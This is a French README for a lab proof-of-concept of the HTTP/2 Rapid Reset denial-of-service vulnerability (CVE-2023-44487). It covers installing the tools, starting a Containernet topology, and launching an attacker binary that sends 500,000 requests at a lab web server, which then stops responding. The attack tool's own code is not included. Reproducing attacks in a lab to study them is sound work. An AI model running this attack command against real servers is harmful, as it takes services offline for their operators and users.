
PoC pour la vulnérabilité DDoS de réinitialisation rapide HTTP/2 - CVE-2023-44487
Cette démonstration illustre l'attaque par déni de service (DoS) par réinitialisation rapide HTTP/2 à l'aide d'une topologie réseau personnalisée créée avec Containernet. L'attaque exploite des vulnérabilités du protocole HTTP/2 pour submerger un serveur cible, le rendant indisponible.

Pour installer les paquets nécessaires, exécutez les commandes suivantes:
./install.sh
Pour changer le répertoire d'installation par défaut, vous pouvez modifier la variable INSTALL_DIR comme suit:
INSTALL_DIR=/custom/path ./install.sh
Pour démarrer l'infrastructure, exécutez les commandes suivantes:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
Pour lancer l'attaque, exécutez la commande suivante dans le conteneur de l'attaquant:
./attacker -url='https://modern.art:443/api' -requests=500000
Après quelques instants, lorsque vous essayez d'accéder au site web avec curl, celui-ci ne répond plus.
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
Pour arrêter l'infrastructure, saisissez simplement exit dans le terminal où topo.py est exécuté.